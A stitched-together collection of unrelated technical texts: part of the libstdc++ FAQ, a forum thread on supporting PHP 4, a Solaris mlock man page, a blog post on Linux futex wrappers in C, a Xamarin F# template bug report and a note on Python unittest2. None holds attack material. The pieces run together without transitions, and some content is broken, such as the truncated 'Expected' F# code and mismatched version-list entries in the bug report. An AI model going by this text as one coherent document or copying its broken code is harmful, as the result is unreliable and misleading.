Here the shell variable ${prefix} is assumed to contain the directory prefix where GCC was installed to. The directory containing the library might depend on whether you want the 32-bit or 64-bit copy of the library, so for example it would be ${prefix}/lib64 on some systems. The exact environment variable to use will depend on your platform, e.g. DYLD_LIBRARY_PATH for Darwin, LD_LIBRARY_PATH_32/LD_LIBRARY_PATH_64 for Solaris 32-/64-bit, and SHLIB_PATH for HP-UX.

See the man pages for ld, ldd and ldconfig for more information.
The dynamic linker has different names on different platforms but the man page is usually called something such as ld.so, rtld or dld.so.

Using LD_LIBRARY_PATH is not always the best solution; Finding Dynamic or Shared Libraries in the manual gives some alternatives.

3.5. What's libsupc++?

If the only functions from libstdc++.a which you need are language support functions (those listed in clause 18 of the standard, e.g., new and delete), then try linking against libsupc++.a, which is a subset of libstdc++.a. (Using gcc instead of g++ and explicitly linking in libsupc++.a via -lsupc++ for the final link step will do it.) This library contains only those support routines, one per object file. But if you are using anything from the rest of the library, such as IOStreams or vectors, then you'll still need pieces from libstdc++.a.

3.6. This library is HUGE!

Usually the size of libraries on disk isn't noticeable. When a link editor (or simply “linker”) pulls things from a static archive library, only the necessary object files are copied into your executable, not the entire library. Unfortunately, even if you only need a single function or variable from an object file, the entire object file is extracted. (There's nothing unique to C++ or libstdc++ about this; it's just common behavior, given here for background reasons.)

Some of the object files which make up libstdc++.a are rather large. If you create a statically-linked executable with -static, those large object files are suddenly part of your executable. Historically the best way around this was to only place a very few functions (often only a single one) in each source/object file; then extracting a single function is the same as extracting a single .o file.
For libstdc++ this is only possible to a certain extent; the object files in question contain template classes and template functions, pre-instantiated, and splitting those up causes severe maintenance headaches.

On supported platforms, libstdc++ takes advantage of garbage collection in the GNU linker to get a result similar to separating each symbol into a separate source and object file. On these platforms, GNU ld can place each function and variable into its own section in a .o file. The GNU linker can then perform garbage collection on unused sections; this reduces the situation to only copying needed functions into the executable, as before, but it all happens automatically.

4.1. Can libstdc++ be used with non-GNU compilers?

Perhaps. Since the goal of ISO Standardization is for all C++ implementations to be able to share code, libstdc++ should be usable under any ISO-compliant compiler, at least in theory. However, the reality is that libstdc++ is targeted and optimized for GCC/G++. This means that often libstdc++ uses specific, non-standard features of G++ that are not present in older versions of proprietary compilers. It may take as much as a year or two after an official release of GCC that contains these features for proprietary tools to support these constructs.

Recent versions of libstdc++ are known to work with the Clang compiler. In the near past, specific released versions of libstdc++ have been known to work with versions of the EDG C++ compiler, and vendor-specific proprietary C++ compilers such as the Intel ICC C++ compiler.

4.2. No 'long long' type on Solaris?

By default we try to support the C99 long long type. This requires that certain functions from your C library be present. Up through release 3.0.2 the platform-specific tests performed by libstdc++ were too general, resulting in a conservative approach to enabling the long long code paths. The most commonly reported platform affected was Solaris.
This has been fixed for libstdc++ releases greater than 3.0.3.

4.3. _XOPEN_SOURCE and _GNU_SOURCE are always defined?

On Solaris, g++ (but not gcc) always defines the preprocessor macro _XOPEN_SOURCE. On GNU/Linux, the same happens with _GNU_SOURCE. (This is not an exhaustive list; other macros and other platforms are also affected.)

These macros are typically used in C library headers, guarding new versions of functions from their older versions. The C++98 standard library includes the C standard library, but it requires the C90 version, which for backwards-compatibility reasons is often not the default for many vendors. More to the point, the C++ standard requires behavior which is only available on certain platforms after certain symbols are defined. Usually the issue involves I/O-related typedefs. In order to ensure correctness, the compiler simply predefines those symbols.

Note that it's not enough to #define them only when the library is being built (during installation). Since we don't have an 'export' keyword, much of the library exists as headers, which means that the symbols must also be defined as your programs are parsed and compiled.

To see which symbols are defined, look for CPLUSPLUS_CPP_SPEC in the gcc config headers for your target (and try changing them to see what happens when building complicated code). You can also run g++ -E -dM - < /dev/null to display a list of predefined macros for any particular installation.

This has been discussed on the mailing lists quite a bit. This method is something of a wart. We'd like to find a cleaner solution, but nobody yet has contributed the time.

4.4. Mac OS X ctype.h is broken! How can I fix it?

This answer is old and probably no longer relevant. This was a long-standing bug in the OS X support. Fortunately, the patch was quite simple, and well-known.

4.5. Threading is broken on i386?
Support for atomic integer operations was broken on i386 platforms. The assembly code accidentally used opcodes that are only available on the i486 and later. So if you configured GCC to target, for example, i386-linux, but actually used the programs on an i686, then you would encounter no problems. Only when actually running the code on an i386 will the problem appear. This is fixed in 3.2.2.

4.6. MIPS atomic operations

The atomic locking routines for MIPS targets require MIPS II and later. A patch went in just after the 3.3 release to make mips* use the generic implementation instead. You can also configure for mipsel-elf as a workaround. The mips*-*-linux* port continues to use the MIPS II routines, and more work in this area is expected.

4.7. Recent GNU/Linux glibc required?

When running on GNU/Linux, libstdc++ 3.2.1 (shared library version 5.0.1) and later uses localization and formatting code from the system C library (glibc) version 2.2.5, which contains necessary bugfixes. All GNU/Linux distros make more recent versions available now. libstdc++ 4.6.0 and later require glibc 2.3 or later for this localization and formatting code.

The guideline is simple: the more recent the C++ library, the more recent the C library. (This is also documented in the main GCC installation instructions.)

4.8. Can't use wchar_t/wstring on FreeBSD

Older versions of FreeBSD's C library do not have sufficient support for wide character functions, and as a result the libstdc++ configury decides that wchar_t support should be disabled. In addition, the libstdc++ platform checks that enabled wchar_t support were quite strict, and not granular enough to detect when the minimal support to enable wchar_t and C++ library structures like wstring were present. This impacted Solaris, Darwin, and BSD variants, and is fixed in libstdc++ versions post 4.1.0.

5.1. What works already?

Short answer: Pretty much everything works except for some corner cases.
Support for localization in locale may be incomplete on some non-GNU platforms. Also dependent on the underlying platform is support for wchar_t and long long specializations, and details of thread support.

Long answer: See the implementation status pages for C++98, TR1, C++11, and C++14.

5.2. Bugs in the ISO C++ language or library specification

Unfortunately, there are some. For those people who are not part of the ISO Library Group (i.e., nearly all of us needing to read this page in the first place), a public list of the library defects is occasionally published on the WG21 website. Many of these issues have resulted in code changes in libstdc++.

If you think you've discovered a new bug that is not listed, please post a message describing your problem to the author of the library issues list.

5.3. Bugs in the compiler (gcc/g++) and not libstdc++

On occasion, the compiler is wrong. Please be advised that this happens much less often than one would think, and avoid jumping to conclusions.

First, examine the ISO C++ standard. Second, try another compiler or an older version of the GNU compilers. Third, you can find more information on the libstdc++ and the GCC mailing lists: search these lists with terms describing your issue.

Before reporting a bug, please examine the bugs database with the category set to “g++”.

6.1. Reopening a stream fails

One of the most-reported non-bug reports. Executing a sequence like:

#include <fstream>
...
std::fstream fs("a_file");
// .
// . do things with fs...
// .
fs.close();
fs.open("a_new_file");

All operations on the re-opened fs will fail, or at least act very strangely. Yes, they often will, especially if fs reached the EOF state on the previous file. The reason is that the state flags are not cleared on a successful call to open(). The standard unfortunately did not specify behavior in this case, and to everybody's great sorrow, the proposed LWG resolution in DR #22 is to leave the flags unchanged.
You must insert a call to fs.clear() between the calls to close() and open(), and then everything will work like we all expect it to work. Update: for GCC 4.0 we implemented the resolution of DR #409 and open() now calls clear() on success!

6.2. -Weffc++ complains too much

Many warnings are emitted when -Weffc++ is used. Making libstdc++ -Weffc++-clean is not a goal of the project, for a few reasons. Mainly, that option tries to enforce object-oriented programming, while the Standard Library isn't necessarily trying to be OO.

We do, however, try to have libstdc++ sources as clean as possible. If you see some simple changes that pacify -Weffc++ without other drawbacks, send us a patch.

6.3. Ambiguous overloads after including an old-style header

Another problem is the rel_ops namespace and the template comparison operator functions contained therein. If they become visible in the same namespace as other comparison functions (e.g., by “using” them and including the <iterator> header), then you will suddenly be faced with huge numbers of ambiguity errors. This was discussed on the -v3 list; Nathan Myers sums things up here. The collisions with vector/string iterator types have been fixed for 3.1.

6.4. The g++-3 headers are not ours

If you are using headers in ${prefix}/include/g++-3, or if the installed library's name looks like libstdc++-2.10.a or libstdc++-libc6-2.10.so, then you are using the old libstdc++-v2 library, which is non-standard and unmaintained. Do not report problems with -v2 to the -v3 mailing list.

For GCC versions 3.0 and 3.1 the libstdc++ header files are installed in ${prefix}/include/g++-v3 (see the 'v'?). Starting with version 3.2 the headers are installed in ${prefix}/include/c++/${version}, as this prevents headers from previous versions being found by mistake.

6.5.
Errors about *Concept and constraints in the STL

If you see compilation errors containing messages about foo Concept and something to do with a constraints member function, then most likely you have violated one of the requirements for types used during instantiation of template containers and functions. For example, EqualityComparableConcept appears if your types must be comparable with == and you have not provided this capability (a typo, or wrong visibility, or you just plain forgot, etc.).

More information, including how to optionally enable/disable the checks, is available in the Diagnostics chapter of the manual.

6.6. Program crashes when using library code in a dynamically-loaded library

If you are using the C++ library across dynamically-loaded objects, make certain that you are passing the correct options when compiling and linking:

Compile your library components:
g++ -fPIC -c a.cc
g++ -fPIC -c b.cc
...
g++ -fPIC -c z.cc

Create your library:
g++ -fPIC -shared -rdynamic -o libfoo.so a.o b.o ... z.o

Link the executable:
g++ -fPIC -rdynamic -o foo ... -L. -lfoo -ldl

6.7. “Memory leaks” in containers

A few people have reported that the standard containers appear to leak memory when tested with memory checkers such as valgrind. Under some configurations the library's allocators keep free memory in a pool for later reuse, rather than returning it to the OS. Although this memory is always reachable by the library and is never lost, memory debugging tools can report it as a leak. If you want to test the library for memory leaks please read Tips for memory leak hunting first.

6.8. list::size() is O(n)!

See the Containers chapter.

6.9. Aw, that's easy to fix!

If you have found a bug in the library and you think you have a working fix, then send it in! The main GCC site has a page on submitting patches that covers the procedure, but for libstdc++ you should also send the patch to our mailing list in addition to the GCC patches mailing list.
The libstdc++ contributors' page also talks about how to submit patches. In addition to the description, the patch, and the ChangeLog entry, it is a Good Thing if you can additionally create a small test program to test for the presence of the bug that your patch fixes. Bugs have a way of being reintroduced; if an old bug creeps back in, it will be caught immediately by the testsuite - but only if such a test exists.

7.1. string::iterator is not char*; vector<T>::iterator is not T*

If you have code that depends on container<T> iterators being implemented as pointer-to-T, your code is broken. It's considered a feature, not a bug, that libstdc++ points this out. While there are arguments for iterators to be implemented in that manner, A) they aren't very good ones in the long term, and B) they were never guaranteed by the Standard anyway. The type-safety achieved by making iterators a real class rather than a typedef for T* outweighs nearly all opposing arguments.

Code which does assume that a vector iterator i is a pointer can often be fixed by changing i in certain expressions to &*i. Future revisions of the Standard are expected to bless this usage for vector<> (but not for basic_string<>).

7.2. What's next after libstdc++?

Hopefully, not much. The goal of libstdc++ is to produce a fully-compliant, fully-portable Standard Library. After that, we're mostly done: there won't be any more compliance work to do.

There is an effort underway to add significant extensions to the standard library specification. The latest version of this effort is described in The C++ Library Technical Report 1.

7.3. What about the STL from SGI?

The STL from SGI, version 3.3, was the final merge of the STL codebase. The code in libstdc++ contains many fixes and changes, and the SGI code is no longer under active development. We expect that no future merges will take place.
In particular, string is not from SGI and makes no use of their "rope" class (which is included as an optional extension), nor is valarray, and some others. Classes like vector<> are, but have been extensively modified.

More information on the evolution of libstdc++ can be found at the API evolution and backwards compatibility documentation.

The FAQ for SGI's STL is still recommended reading.

7.4. Extensions and Backward Compatibility

See the link on backwards compatibility and link on evolution.

7.5. Does libstdc++ support TR1?

Yes. The C++ Standard Library Technical Report adds many new features to the library. The latest version of this effort is described in Technical Report 1. The implementation status of TR1 in libstdc++ can be tracked on the TR1 status page.

7.6. How do I get a copy of the ISO C++ Standard?

You can buy a copy of the standard from your country's national standards organization; in the USA that is ANSI, and their website is right here. (And if you've already registered with them, clicking this link will take you directly to the place where you can buy the standard on-line.) Who is your country's member body? Visit the ISO homepage and find out!

The 2003 version of the standard (the 1998 version plus TC1) is available in print, ISBN 0-470-84674-7.

7.7. What's an ABI and why is it so messy?

ABI stands for “Application Binary Interface”. Conventionally, it refers to a great mass of details about how arguments are arranged on the call stack and/or in registers, and how various types are arranged and padded in structs. A single CPU design may suffer multiple ABIs designed by different development tool vendors who made different choices, or even by the same vendor for different target applications or compiler versions. In ideal circumstances the CPU designer presents one ABI and all the OSes and compilers use it. In practice every ABI omits details that compiler implementers (consciously or accidentally) must choose for themselves.
That ABI definition suffices for compilers to generate code so a program can interact safely with an OS and its lowest-level libraries. Users usually want an ABI to encompass more detail, allowing libraries built with different compilers (or different releases of the same compiler!) to be linked together. For C++, this includes many more details than for C, and most CPU designers (for good reasons elaborated below) have not stepped up to publish C++ ABIs. Such an ABI has been defined for the Itanium architecture (see C++ ABI for Itanium) and that is used by G++ and other compilers as the de facto standard ABI on many common architectures (including x86). G++ can also use the ARM architecture's EABI, for embedded systems relying only on a “free-standing implementation” that doesn't include (much of) the standard library, and the GNU EABI for hosted implementations on ARM. Those ABIs cover low-level details such as virtual function implementation, struct inheritance layout, name mangling, and exception handling. A useful C++ ABI must also incorporate many details of the standard library implementation. For a C ABI, the layouts of a few structs (such as FILE, stat, jmpbuf, and the like) and a few macros suffice. For C++, the details include the complete set of names of functions and types used, the offsets of class members and virtual functions, and the actual definitions of all inlines. C++ exposes many more library details to the caller than C does. It makes defining a complete ABI a much bigger undertaking, and requires not just documenting library implementation details, but carefully designing those details so that future bug fixes and optimizations don't force breaking the ABI. There are ways to help isolate library implementation details from the ABI, but they trade off against speed. 
Library details used in inner loops (e.g., getchar) must be exposed and frozen for all time, but many others may reasonably be kept hidden from user code, so they may later be changed. Deciding which, and implementing the decisions, must happen before you can reasonably document a candidate C++ ABI that encompasses the standard library.

7.8. How do I make std::vector<T>::capacity() == std::vector<T>::size()?

The standard idiom for deallocating a vector<T>'s unused memory is to create a temporary copy of the vector and swap their contents, e.g. for vector<T> v:

std::vector<T>(v).swap(v);

The copy will take O(n) time and the swap is constant time. See Shrink-to-fit strings for a similar solution for strings.
Should my web app be compatible with PHP 4? You know there are some big OO differences and database stuff. What's your idea? When will PHP4 and IE6 say goodbye!?

I won't touch anything below 5.2. Generally I find complete rewrites, without the restriction of older versions, allow for easier addition of features and more possibilities. Though, to be fair, PHP 4 wasn't exactly incapable - it just meant having to approach things differently.

The only reason to even think about php4 is if you have inherited a legacy app that won't run on 5. There is a massive difference between php and ie: with php you have control of the version, with ie the user does. Basically: support ie6 as long as it is financially beneficial to do so; support php4 as long as you are getting paid to do so.

I mentioned ie here just for joking :). My question is just about PHP and the current servers' support for php5.

I...started developing for 5.3 and up exclusively. Symfony has gone the same route with version 2 of their framework. For me version portability is the crutch of legacy cruft that I want no part of.

Not me, I am still not using 5.3 as a minimal requirement, but I do have 5.2 as my min required version.

Absolutely not, PHP4 is broken and will never be fixed.

There are some plugins that can fix it, and library files are also available.

Just: no. With WordPress I'd expect new features to be added that will only function with PHP 5. The PHP 4 compatibility would be progressively removed as it interferes with the new features, rather than someone specifically going through and rewriting everything to get rid of it. I'd expect the same to be true of any other open source software.

If it ain't broke then why risk breaking it by trying to fix it? If a client already had PHP4 hosting and I was doing minimal programming, like a contact form, then I'd support it, but for anything else, no.
I'd like to start with PHP 5.3, mostly for namespaces, but for me that would be a bit limiting regarding hosting. Logic Earth - do you have 5.3 host recommendations?

Thanks guys, NO is the right answer! A poll would have been more effective.

I'd say about 10% of PHP developers bother with PHP 4 at current times. I still see a fair few people around the forums mentioning that their system is PHP4 or that they haven't even personally made the jump from 4 to 5. Me however - I can't think of a realistic situation where PHP 4 is required. Servers can be upgraded and old software can be routed to PHP 4 if required.

PHP 4 is long dead and has a growing number of security holes in it that will never be plugged. There is no reason for doing any further development for it, since anyone who has been asleep for the last couple of years and therefore missed its death can be advised to upgrade to a current version of PHP. Properly written scripts for PHP 4 will still work on PHP 5, so it is only if they are still using scripts intended for PHP 3 that they would have problems with the upgrade. The question of whether to support old versions of software should only really arise between the release of the replacement version and the death of the old version. So the question of whether to support PHP 4 was only really something that different people should have been making their own decisions on between the introduction of PHP 5 and the death of PHP 4 in 2008. There was plenty of time between the introduction of PHP 4 and its death in 2008 to upgrade code from PHP 3 and change the things that PHP 3 supported and PHP 5 doesn't (which were all flagged as deprecated in PHP 4, so you'd know that they were being removed).

I was checking the db class of WordPress and discovered they somehow considered PHP4 compatibility:

/**
 * Connects to the database server and selects a database
 *
 * PHP4 compatibility layer for calling the PHP5 constructor.
 *
 * @uses wpdb::__construct() Passes parameters and returns result
 * @since 0.71
 *
 * @param string $dbuser MySQL database user
 * @param string $dbpassword MySQL database password
 * @param string $dbname MySQL database name
 * @param string $dbhost MySQL database host
 */
function wpdb($dbuser, $dbpassword, $dbname, $dbhost) {
    return $this->__construct($dbuser, $dbpassword, $dbname, $dbhost);
}

/**
 * Connects to the database server and selects a database
 *
 * PHP5 style constructor for compatibility with PHP5. Does
 * the actual setting up of the class properties and connection
 * to the database.
 *
 * @since 2.0.8
 *
 * @param string $dbuser MySQL database user
 * @param string $dbpassword MySQL database password
 * @param string $dbname MySQL database name
 * @param string $dbhost MySQL database host
 */
function __construct($dbuser, $dbpassword, $dbname, $dbhost) {
    register_shutdown_function(array(&$this, "__destruct"));
    if ( WP_DEBUG )
        $this->show_errors();
    .....

Are they right? Of course it's a personal decision.

That is most likely backwards compatibility. If you're starting a new project then it's irrelevant.

At least for me, this all depends on the client if you do not have your own server to deploy the site on. So if the client has a server running PHP4 then one is compelled to work with PHP4, even though we can suggest/recommend that the client go for PHP5 with its many features. I still have one client who has not had the server upgraded to PHP5 because some websites are running with a huge number of files written in traditional PHP4, and I am also compelled to write code for PHP4, which is a real pain for me in this era of OOP, because I have PHP 5.3 on my local system for the rest of my work and I always need to switch to PHP4 when I work for them. And regarding IE6, we cannot avoid it yet because most of the users in the world have Windows XP, which originally shipped with IE6.
Otherwise, I would really have deleted/removed IE6 from my dictionary.

No question about new projects. When WordPress was first created, PHP 4 was the latest and greatest, and so of course WordPress was designed to be able to run there. Why add to the workload by spending time deleting all the compatibility for PHP 4 when the time could be better spent adding new features?
http://community.sitepoint.com/t/do-you-consider-php-4-while-developing-new-apps/51930
#include <sys/mman.h>

int mlock(const void *addr, size_t len);
int munlock(const void *addr, size_t len);

Multiple mlock() operations on the same address in the same process will all be removed with a single munlock(). Of course, a page locked in one process and mapped in another (or visible through a different mapping in the locking process) is still locked in memory. This fact can be used to create applications that do nothing other than lock important data in memory, thereby avoiding page I/O faults on references from other processes in the system. The contents of the locked pages will not be transferred to or from disk except when explicitly requested by one of the locking processes. This guarantee applies only to the mapped data, and not to any associated data structures (file descriptors and on-disk metadata, among others). If the mapping through which an mlock() has been performed is removed, an munlock() is implicitly performed. An munlock() is also performed implicitly when a page is deleted through file removal or truncation. Locks established with mlock() are not inherited by a child process after a fork() and are not nested. Attempts to mlock() more memory than a system-specific limit will fail.

Upon successful completion, the mlock() and munlock() functions return 0. Otherwise, no changes are made to any locks in the address space of the process, the functions return −1 and set errno to indicate the error.

The mlock() and munlock() functions will fail if:

- The addr argument is not a multiple of the page size as returned by sysconf(3C).
- Addresses in the range [addr, addr + len) are invalid for the address space of a process, or specify one or more pages which are not mapped.
- The system does not support this memory locking interface.
- The {PRIV_PROC_LOCK_MEMORY} privilege is not asserted in the effective set of the calling process.
The mlock() function will fail if:

- Some or all of the memory identified by the range [addr, addr + len) could not be locked because of insufficient system resources or because of a limit or resource control on locked memory.

Because of the impact on system resources, the use of mlock() and munlock() is restricted to users with the {PRIV_PROC_LOCK_MEMORY} privilege.

See attributes(5) for descriptions of the attributes of these interfaces.

SEE ALSO: fork(2), memcntl(2), mmap(2), plock(3C), mlockall(3C), sysconf(3C), attributes(5), standards(5)
http://docs.oracle.com/cd/E36784_01/html/E36874/munlock-3c.html
POSIX’ condition variables pthread_cond_t unfortunately have some drawbacks:

- They require the use of at least two separate other objects that are only loosely coupled with the condition variable itself:
  - A plain variable, say X of type int, that actually holds the value on which the condition depends.
  - A mutex that is just there to regulate the access to X and to the condition variable.
- Generally they are not lock free. To access X we have to
  - lock the mutex
  - inspect X
  - eventually wait for the condition to become true
  - do changes
  - eventually signal other waiters about the changes we made
  - unlock the mutex

Linux’ concept of futexes allows us to associate an equivalent concept directly with the variable X and to access this variable directly, without taking locks, in most of the cases. More precisely, a futex solely works with the address and the value of variable X.

Atomic access

To access the value, we are supposed to use atomic operations. These are operations that are usually implemented in just one assembler instruction (but several clock cycles). They access the variable, change it and return the previous value with guaranteed atomicity: no other thread or process will come in the way, and if the operation succeeds, all others will see the changed value. I will not go much into detail about these operations. They are not part of the current C99 standard but will be in the upcoming C1x. I will use the notations from there, but you may have a read of the gcc extension that already implements this kind of operations. I will only suppose that we are given two functions:

inline int atomic_fetch_add(int volatile *object, int operand);
inline int atomic_fetch_sub(int volatile *object, int operand);

Both return the value that had previously been stored in *object and add (respectively subtract) the operand.

Making futexes available to user space

As said above, Linux’ futexes work with the address and the value of an int variable X.
Linux exports several system calls for that; we will look into two of them that offer a “wait” and a “wake” procedure. If you look into the man page for futex on a Linux machine you will usually find an entry (futex(2)), but unfortunately the library interface for that system call is missing, so we have to build it first. The man page also states that you should stay away from this feature if you don’t know what you are doing. The goal of this text here is actually to make sure that at the end you will know what is necessary to use futexes well. For what we will be doing here, we will encapsulate the system call as follows:

# include <linux/futex.h>
# include <sys/syscall.h>

inline
int orwl_futex(int *uaddr, /*!< the base address to be used */
               int op,     /*!< the operation that is to be performed */
               int val     /*!< the value that a wait operation expects
                                when going into wait, or the number of
                                tasks to wake up */
               ) {
  return syscall(SYS_futex, uaddr, op, val, (void*)0, (int*)0, 0);
}

Wake up

A simple wakeup function now looks like this:

inline
int orwl_futex_wake(int* uaddr, int wakeup) {
  int ret = orwl_futex(uaddr, FUTEX_WAKE, wakeup);
  return ret;
}

The parameter uaddr is the address to which the futex is associated. Internally the kernel has a hash table with all (kernel space) addresses for which there are waiters. Calling orwl_futex_wake will now wake up wakeup threads that the kernel has registered as waiting on that address, respectively fewer if not as many are waiting, or just nobody if nobody is waiting. As indicated, the kernel is using its internal memory address for the identification and not the virtual address that it receives through the system call. Thereby the futex mechanism works not only between different threads of the same process, but also between any processes that have mapped the same kernel page into their virtual memory.
Two common tasks for wakeups are these:

inline
int orwl_futex_signal(int* uaddr) {
  return orwl_futex_wake(uaddr, 1);
}

inline
int orwl_futex_broadcast(int* uaddr) {
  return orwl_futex_wake(uaddr, INT_MAX);
}

That’s it for the wake up part. Since waking up others cannot produce deadlocks, this part is really simple.

Waiting

Waiting is a bit more complicated, because here we have to offer tools that can give us guarantees that we will not have deadlocks:

inline
int orwl_futex_wait_once(int* uaddr, int val) {
  int ret = 0;
  if (P99_UNLIKELY(orwl_futex(uaddr, FUTEX_WAIT, val) < 0)) {
    int errn = errno;
    if (P99_UNLIKELY(errn != EWOULDBLOCK && errn != EINTR)) {
      ret = errn;
    }
    errno = 0;
  }
  return ret;
}

As you can see, the wrapper around orwl_futex is a bit more complex, because the idea that we have of the value (*uaddr) may be wrong. A scenario that could mess up our wait procedure:

- We look up (*uaddr) and find that it has value 5.
- We conclude that 5 for us is really a bad value and decide to take a nap.
- Before we are able to call a “wait” function we are de-scheduled by the scheduler because our time slice is over.
- Another process or thread changes (*uaddr) to 6 and wakes up all waiters.
- We are scheduled again and make the “wait” call, just to never wake up again.

orwl_futex_wait_once will return under three different circumstances:

- A wake up event is triggered by some other task or process. This is in fact what we are waiting for.
- The value (*uaddr) is initially not equal to val. Somebody has changed the value in the meantime and the condition that made us want to wait is no longer fulfilled.
- An interrupt is received. The system wakes up the thread to handle a signal that it received. Once the interrupt handler returns, it returns to its current context, that is, to the end of the wait.

So once we come back from such a call we cannot be sure that the world as we know it has improved; we always have to check.
Typically orwl_futex_wait_once is therefore wrapped into some loop that checks the condition that interests us and returns to the wait state if it is not yet satisfied. Because we want to be able to handle general expressions for our condition, we wrap that loop in a macro and not an inline function:

#define ORWL_FUTEX_WAIT(ADDR, NAME, EXPECTED)                 \
do {                                                          \
  register int volatile*const p = (int volatile*)(ADDR);      \
  for (;;) {                                                  \
    register int NAME = *p;                                   \
    if (EXPECTED) break;                                      \
    register int ret = orwl_futex_wait_once((int*)p, NAME);   \
    if (P99_UNLIKELY(ret)) {                                  \
      assert(!ret);                                           \
    }                                                         \
  }                                                           \
} while (false)

But as you hopefully see, the inner loop is still relatively simple. It loads (*uaddr) into a local variable NAME, checks the condition EXPECTED and only goes into the wait function if it is not fulfilled. When coming back from the wait, the procedure is iterated in the hope that we now fulfill the condition. The rest of the macro is syntactic sugar that ensures that ADDR as passed to the macro is only evaluated once, and also that this macro can be placed anywhere a simple C statement would do.

A counter example

Let us illustrate all this with a simple example of a reference count. The goal is a data structure that has

- atomic increment and decrement for those threads that refer to a resource and
- a wait function for a maintenance thread that waits until all referrers have released the resource.

An API could look like this:

typedef struct counter counter;
struct counter {
  int volatile val;
};

inline int counter_inc(counter* c);
inline int counter_dec(counter* c);
inline void counter_wait(counter* c);

#define ACCOUNT(COUNT) P99_PROTECTED_BLOCK(counter_inc(&COUNT), counter_dec(&COUNT))

The first two functions are just simple wrappers around the atomic operators that are given above; you'll easily figure that out yourself. We'd just have to come up with a sensible specification of whether we want to return the value of the counter before or after the operation.
We don’t even have to use them directly in user code; through the macro ACCOUNT we may use them as

counter myCount = { 0 };

ACCOUNT(myCount) {
  // do something
}

Here P99_PROTECTED_BLOCK will do all the wrapping to make sure that the “inc” and “dec” functions are called exactly once, before entering and after leaving the inner block. Now last but not least, the implementation of the wait function is just a wrapper around our macro:

inline
void counter_wait(counter* c) {
  ORWL_FUTEX_WAIT(&(c->val), X, !X);
}

Here the role of X is just to give a name to the internal variable such that we may refer to it inside the expression. The expression here is just !X, to test whether X is 0 or not. We could have placed any other expression of our liking there, such as (X <= 0) or (X % 42): anything that lets us interpret the value of the counter as a condition that we want to see fulfilled.
https://gustedt.wordpress.com/2011/01/28/linux-futexes-non-blocking-integer-valued-condition-variables/
1. The "new UIWindow(UIScreen.MainScreen.Bounds)" call must be in FinishedLaunching() and not in the AppDelegate's constructor. If it's done in the constructor, the app does not correctly process device rotations when it starts in landscape mode. NOTE: See expected vs. actual below.

2. The Entitlements.plist file is missing, but is referenced in the fsproj file:

<CodesignEntitlements>Entitlements.plist</CodesignEntitlements>

That causes build errors as soon as a project is compiled for the device. The simulator works fine without it.

*Version: VS 3.9.302

*Expected:

namespace Test

open System
open UIKit
open Foundation

[<Register ("AppDelegate")>]
type AppDelegate () =
    inherit UIApplicationDelegate ()

    override val Window =

module Main =
    [<EntryPoint>]
    let main args =
        UIApplication.Main (args, null, "AppDelegate")
        0

*Actual:

namespace Test

open System
open UIKit
open Foundation

[<Register ("AppDelegate")>]
type AppDelegate () =
    inherit UIApplicationDelegate ()

    let window = new UIWindow (UIScreen.MainScreen.Bounds)

    // This method is invoked when the application is ready to run.
    override this.FinishedLaunching (app, options) =
        // If you have defined a root view controller, set it here:
        // window.RootViewController <- new MyViewController ()
        window.MakeKeyAndVisible ()
        true

module Main =
    [<EntryPoint>]
    let main args =
        UIApplication.Main (args, null, "AppDelegate")
        0

*Addendum: The Expected vs. Actual snippets come from the latest XS template (Expected) and the VS template (Actual).

I have reproduced this issue at my end using the latest builds, and have observed that on creating the F# >> iOS template application the code appears as shown above under "Actual". Moreover, the Entitlements.plist file is missing, because of which the application gives a build error when trying to deploy to the device. Below is the screencast for the same:

VS Logs:

I can confirm that using the latest Visual Studio 2017 Preview version 15.3 I am able to reproduce this issue.
Marking this report as CONFIRMED.

Microsoft Visual Studio Enterprise 2017 Preview (15.3)
Version 15.3.0 Preview 4.0
VisualStudio.15.Preview/15.3.0-pre.4.0+26711.1
Microsoft .NET Framework Version 4.7.02046

Installed Version: Enterprise

ASP.NET Web Frameworks and Tools 2017   5.2.50601.0
    For additional information, visit
Azure App Service Tools v3.0.0   15.0.30623.0
    Azure App Service Tools v3.0.0
Azure Data Lake Node   1.0
    This package contains the Data Lake integration nodes for Server Explorer.
Azure Data Lake Tools for Visual Studio   2.2.9000.0
    Microsoft Azure Data Lake Tools for Visual Studio
Azure Data Lake Tools for Visual Studio   2.2.9000.0
    Microsoft Azure Data Lake Tools for Visual Studio
Common Azure Tools   1.10
    Provides common services for use by Azure Mobile Services and Microsoft Azure Tools.
Fabric.DiagnosticEvents   1.0
    Fabric Diagnostic Events
JavaScript Language Service   2.0
    JavaScript Language Service
Merq   1.1.17-rc (cba4571)
    Command Bus, Event Stream and Async Manager for Visual Studio extensions.
Microsoft Azure HDInsight Azure Node   2.2.9000.0
    HDInsight Node under Azure Node
Microsoft Azure Hive Query Language Service   2.2.9000.0
    Language service for Hive query
Microsoft Azure Stream Analytics Language Service   2.2.9000.0
    Language service for Azure Stream Analytics
Microsoft Azure Stream Analytics Node   1.0
    Azure Stream Analytics Node under Azure Node
Microsoft Azure Tools   2.9
    Microsoft Azure Tools for Microsoft Visual Studio 2017 - v2.9.50628.2
Mono Debugging for Visual Studio   4.6.8-pre (ec7034f)
    Support for debugging Mono processes with Visual Studio.
NuGet Package Manager   4.3.3.4.0
    TypeScript tools for Visual Studio
Visual Studio Code Debug Adapter Host Package   1.0
    Interop layer for hosting Visual Studio Code debug adapters in Visual Studio
WebJobs Tools v1.0.0   __RESXID_PRODUCTVERSION__
    WebJobs Tools v1.0.0.

Hey Jon!
I've moved this issue over to VSTS for further tracking: If you're interested in continuing to follow the status of this issue, please click the 'Follow' button on the bug in VSTS. In the future, please feel free to file bugs via aka.ms/xvs-bug, which feeds into our new bug tracker in VSTS. Thanks again for reporting this issue! <3 Pierce Boggan
https://bugzilla.xamarin.com/27/27373/bug.html
So, for example, many of the current features of unittest2 will be available in unittest in 2.7 and 3.2. This makes those features available to those that rely almost entirely on standard library functionality rather than third party packages. In the meantime, users of previous versions of Python can already use unittest2, and that package will work *without name conflicts* in both 2.7 and 3.2, even though many of its features have been added to the standard library. unittest2 may then even go through a few external releases before being synced up again with the standard library's unittest when 3.3 comes around.

Something similar may turn out to be a good idea for distutils2: rather than consider the anticipated merge back into distutils prior to 3.3 the end of the road, instead continue to use distutils2 to release faster updates while evolving the API design towards 3.4. Users then have the choice - the solid, stable standard library version, or the distinctly named, more rapidly updated PyPI version.

